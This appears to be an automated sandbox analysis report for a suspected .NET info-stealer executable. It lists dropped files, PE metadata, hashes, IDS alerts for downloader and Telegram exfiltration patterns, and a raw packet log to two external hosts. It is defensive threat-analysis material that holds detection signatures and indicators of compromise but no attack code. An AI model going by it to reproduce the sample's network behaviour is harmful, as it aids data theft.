                                                                                                                                                SHA-512:8AAE005E7C3D4039983DFBE51A40A53E5B5D239A0015A4267EFDC27EFE43F0D3408ACDF11B8209A867BB79B8286E696B22E33261F907552D8C0CE653EC077AFA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:MDMP..a..... .........sg............D...............X.......$...\$..........~S..........`.......8...........T............4...............$..........l&..............................................................................eJ.......'......GenuineIntel............T.............sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5BA.tmp.WERInternalMetadata.xml

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8386
                                                                                                                                                Entropy (8bit):3.6919066065698254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:R6l7wVeJkCs6fHfG6Y9RiSU2tXtgmfZDiFprK89bStsf0JGWgVGm:R6lXJQ626Y+SUQXtgmfsrSmf6g9
                                                                                                                                                MD5:7CC450A88FE81FD4FD7ECD931CE63DAA
                                                                                                                                                SHA1:DE5CBA61829D48063DD71B2AFA34DB9DF75B2704
                                                                                                                                                SHA-256:22D1B6438BC78844A30C7CF536D2A2C45BB4FD2D5CBD59208BCF81DB85E12CF1
                                                                                                                                                SHA-512:586C439F05E64B4035563DE8C6A5F8BED853ED0D7FADEEF799220AB4782A475C6B0A239DC4D625821D0DD27E2B4AA06D76E9EE0182DE765F7D5C198E3DAB2502
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.6.8.<./.P.i.

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5F9.tmp.xml

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4711
                                                                                                                                                Entropy (8bit):4.439273745722993
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwWl8zsnNJg77aI9aiFyWpW8VYNnYm8M4JrNn/Fk+q8vnNnkNqDy0PNd:uIjfnI7FF7VC6JAKXm0PNd
                                                                                                                                                MD5:DC23DA1C805FF1A170021C3387E46885
                                                                                                                                                SHA1:29F4DF08B1F5FAA1EF12BAC13EDA4B8762234BF2
                                                                                                                                                SHA-256:5B41BF4E5F21D0FC217E29ABB28622E31AFD5DC3C57CB7B2D1242D6567FD49A7
                                                                                                                                                SHA-512:BF254E706CDDDDE18C230725CDDF546448DDFDDD30CD2D2FFB9454A968998C8E55E18C5CFED4842647BBE95341215FBBE7D3BC60E9C18E5F89A7931120207123
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655157" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1835008
                                                                                                                                                Entropy (8bit):4.465521687600912
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MIXfpi67eLPU9skLmb0b4SWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbq:xXD94SWlLZMM6YFH1+q
                                                                                                                                                MD5:43F81D79B1E09D3CACC8278957187023
                                                                                                                                                SHA1:0E928BAAC4C136262DB0959C77B6E556A13B2476
                                                                                                                                                SHA-256:3B9E017F0557D4FC8EF231E6DD692D00C4F72180FC0A52C444E141D940A2D50D
                                                                                                                                                SHA-512:7BEC43FB945804EEE00BBBE4AF61F01664DA2CE327FB9523F1567906F49433691028B55A3D532647F5985E06337F859674304D2A32C112F468A583D6859C7682
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.7/.\[................................................................................................................................................................................................................................................................................................................................................8"........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.853097462436567
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:file.exe
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5:3b2a532f5145a1e1a1d04daf8119caf1
                                                                                                                                                SHA1:850db92a1aea8c8a7ba5a940c9f9ab19c31ce9a4
                                                                                                                                                SHA256:49039b4b47513f22a7e396b57a73abe02b0032a09089e8fa68c94c0eae655d6b
                                                                                                                                                SHA512:6d99963c39a895ff0dc6ca306fee30ea97c097320d2cb8718be402414e77e4a2ed542be7b674fe3a354a3523bd5737d0c357621a2af341ad9e78c5cc0e1a337c
                                                                                                                                                SSDEEP:12288:C4doaeP1x88nMuJYvYExLntAtRozVeGv5zW/H+ao1aFzJLrujKw+/ZY:hdFeP1HMEYtLkweY5MLbzJX+D
                                                                                                                                                TLSH:57F412F81E55CE9BDC940B7005B2E3BE62765E9EC402C357CBEDECFB7A1165A1908290
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksg..............0..r...$........... ........@.. ....................................@................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:53952576d1abd26e

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4b900a
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x67734B84 [Tue Dec 31 01:40:20 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add al, byte ptr [eax]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb8fb80x4f.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x21a0.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000xb70300xb720020b05148d496e2f908ae278603d2a7faFalse0.9311633425767918data7.859078791569036IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0xba0000x21a00x22002f6094046199257534f2c884afeee2e9False0.8988970588235294data7.474718512892919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xbe0000xc0x200d972e1720e37f81580be2f859a3b5d36False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_ICON0xba0c80x1d72PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9698859113823295
                                                                                                                                                RT_GROUP_ICON0xbbe4c0x14data1.05
                                                                                                                                                RT_VERSION0xbbe700x32cdata0.4642857142857143

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-31T09:15:17.975351+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732193.122.6.16880TCP
                                                                                                                                                2024-12-31T09:15:21.694106+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732193.122.6.16880TCP
                                                                                                                                                2024-12-31T09:15:22.240634+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449749188.114.96.3443TCP
                                                                                                                                                2024-12-31T09:15:24.194291+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449750193.122.6.16880TCP
                                                                                                                                                2024-12-31T09:15:24.740290+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449751188.114.96.3443TCP
                                                                                                                                                2024-12-31T09:15:28.946869+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449755188.114.96.3443TCP
                                                                                                                                                2024-12-31T09:15:31.946675+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449759188.114.96.3443TCP
                                                                                                                                                2024-12-31T09:15:36.900479+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449764149.154.167.220443TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 31, 2024 09:15:01.288230896 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:01.293076038 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:01.293145895 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:01.294137001 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:01.298953056 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.298800945 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.303647041 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:17.308505058 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.930998087 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.974220991 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:17.974272966 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:17.974350929 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:17.975351095 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:17.979177952 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:17.979192972 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.010143042 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.010210991 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:19.010385990 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.010430098 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:19.010497093 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.010533094 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:19.463294029 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.463421106 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.467958927 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.467977047 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.468233109 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.524238110 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.753941059 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.795335054 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.859461069 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.859549046 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:19.859643936 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.906275988 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:19.910636902 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:19.915534973 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:21.648451090 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:21.650510073 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:21.650556087 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:21.650630951 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:21.650908947 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:21.650922060 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:21.694106102 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.107626915 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.109601021 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:22.109630108 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.240628004 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.240674973 CET44349749188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.240737915 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:22.241102934 CET49749443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:22.243803978 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.244688034 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.248712063 CET8049732193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.248756886 CET4973280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.249538898 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:22.249599934 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.249711037 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:22.254453897 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.145787954 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.147362947 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.147399902 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.147473097 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.147692919 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.147705078 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.194291115 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.608141899 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.609594107 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.609613895 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.740298986 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.740343094 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.740498066 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.740721941 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:24.743783951 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.744312048 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.748711109 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.748775005 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.749077082 CET8049752193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:24.749151945 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.749233961 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:24.753952980 CET8049752193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:26.876363993 CET8049752193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:26.877963066 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:26.878011942 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:26.878089905 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:26.878348112 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:26.878370047 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:26.928509951 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.332982063 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.334280014 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:27.334315062 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.482784033 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.482831955 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.482892036 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:27.483288050 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:27.486290932 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.487386942 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.491324902 CET8049752193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.491386890 CET4975280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.492216110 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:27.492300987 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.492362976 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:27.497143984 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.344259977 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.345403910 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.345460892 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.345523119 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.346102953 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.346132040 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.397238970 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.809031963 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.810435057 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.810482025 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.946871042 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.946932077 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.947170973 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.947376966 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:28.950453043 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.951361895 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.955394030 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.955451965 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.956183910 CET8049756193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:28.956255913 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.956366062 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:28.961144924 CET8049756193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:29.597047091 CET8049756193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:29.598169088 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:29.598228931 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:29.598330021 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:29.598579884 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:29.598593950 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:29.647290945 CET4975680192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:30.076659918 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:30.078471899 CET49757443192.168.2.4188.114.96.3
